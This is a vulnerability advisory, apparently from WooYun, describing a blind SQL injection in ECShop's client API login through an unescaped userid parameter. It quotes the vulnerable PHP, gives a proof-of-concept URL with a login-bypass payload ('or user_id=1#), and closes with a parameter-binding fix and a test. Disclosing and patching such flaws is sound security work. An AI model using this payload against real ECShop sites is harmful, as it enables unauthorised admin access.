Brief description:
I have tested this vulnerability myself. When the server has magic_quotes_gpc disabled, a blind SQL injection is possible that is not affected by the ECShop core input filter. It is not difficult this time.
The problem file is /api/client/api.php.
Parameters are taken from POST.
Detailed description:
/api/client/api.php, line 4:
dispatch($_POST);
/api/client/includes/lib_api.php, lines 6-10:
$func_arr = array('getdomain', 'userlogin', 'addcategory', 'addbrand', 'addgoods', 'getcategory', 'getbrand', 'getgoods', 'deletebrand', 'deletecategory', 'deleteuploads', 'editbrand', 'editcategory', 'editgoods');
if (in_array($post['action'], $func_arr) && function_exists('api_' . $post['action']))
{
    // PHP function names are case-insensitive, so 'api_userlogin' resolves to API_UserLogin
    return call_user_func('api_' . $post['action'], $post);
}
When $_POST['action'] = 'userlogin', the dispatcher calls:
/api/client/includes/lib_api.php, line 246:
function API_UserLogin($post)
{
    $post['username'] = isset($post['userid']) ? trim($post['userid']) : '';
    $post['password'] = isset($post['password']) ? strtolower(trim($post['password'])) : '';

    /* Check whether the password is correct */
    $sql = "SELECT user_id, user_name, password, action_list, last_login " .
           "FROM " . $GLOBALS['ecs']->table('admin_user') .
           " WHERE user_name = '" . $post['username'] . "'";   // userid is concatenated into the query unescaped
    $row = $GLOBALS['db']->getRow($sql);
    if ($row)
    {
        if ($row['password'] != $post['password'])
        {
            client_show_message(103);
        }
        require_once(ROOT_PATH . ADMIN_PATH . '/includes/lib_main.php');
        // Login successful
        set_admin_session($row['user_id'], $row['user_name'], $row['action_list'], $row['last_login']);
        // Update the last login time and IP address
        $GLOBALS['db']->query("UPDATE " . $GLOBALS['ecs']->table('admin_user') .
            " SET last_login = '" . gmtime() . "', last_ip = '" . real_ip() . "'" .
            " WHERE user_id = '$_SESSION[admin_id]'");
        client_show_message(100, true, VERSION, 0, true, EC_CHARSET);
    }
}
The userid parameter is placed into the query without any filtering, and because this entry point does not pass through the core input filter, the result is a blind SQL injection.
Proof of vulnerability:
http://www.bkjia.com/ecshop/api/client/api.php?action=UserLogin&UserId=%27%20or%20user_id=1%23
Note: To make testing easier, I changed the POST method in the code to GET, and to make a successful injection visible I inserted code after the SQL statement is executed to display the result. The real environment does not show the results.
Solution:
Filter the userid parameter before it is used in the query: escape it, or bind it as a query parameter instead of concatenating it into the SQL string.
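As an added illustration of that fix (example code written for this page, not ECShop's own), here is the same admin lookup with the user name bound as a query parameter, plus a self-contained run against an in-memory SQLite table. It assumes a PDO connection with the pdo_sqlite driver rather than ECShop's $GLOBALS['db'] wrapper, and the table name ecs_admin_user (the default ecs_ prefix) in place of $GLOBALS['ecs']->table('admin_user'); the password comparison keeps the original function's lowercased-string semantics. The admin row is constructed test data.

```php
<?php
// Added example, not ECShop code. Assumptions: a PDO handle (here SQLite
// in memory, needs pdo_sqlite) stands in for $GLOBALS['db'], and the admin
// table is ecs_admin_user (default prefix) instead of
// $GLOBALS['ecs']->table('admin_user').

function api_userlogin_safe(PDO $db, array $post): ?array
{
    // Same normalisation as API_UserLogin
    $username = isset($post['userid']) ? trim($post['userid']) : '';
    $password = isset($post['password']) ? strtolower(trim($post['password'])) : '';

    // The user name is a bound parameter: a payload such as  ' or user_id=1#
    // is compared as a literal string and never reaches the SQL parser.
    $stmt = $db->prepare(
        'SELECT user_id, user_name, password, action_list, last_login '
        . 'FROM ecs_admin_user WHERE user_name = :name'
    );
    $stmt->execute([':name' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // No such user, or wrong password: the caller maps this to
    // client_show_message(103) exactly as the original does.
    if ($row === false || $row['password'] !== $password) {
        return null;
    }
    return $row;
}

// Constructed test data: one admin account in an in-memory SQLite table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ecs_admin_user ('
    . 'user_id INTEGER PRIMARY KEY, user_name TEXT, password TEXT, '
    . 'action_list TEXT, last_login INTEGER)');
$db->exec("INSERT INTO ecs_admin_user VALUES "
    . "(1, 'admin', 'e10adc3949ba59abbe56e057f20f883e', 'all', 0)");

// The proof-of-concept payload from above, sent as the userid parameter:
// with binding it matches no row, so login is refused.
var_dump(api_userlogin_safe($db, ['userid' => "' or user_id=1#", 'password' => 'x']));

// A legitimate login still works (password compared lowercased, as in the original).
$row = api_userlogin_safe($db, ['userid' => 'admin', 'password' => 'E10ADC3949BA59ABBE56E057F20F883E']);
var_dump($row['user_name']);
```

If ECShop's own database wrapper must be kept, the narrower patch is to escape the value before concatenation (as the core filter does for the other entry points when magic quotes are off), but binding the parameter removes the whole class of problem rather than this one instance of it.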
Author: tenzy @ wooyun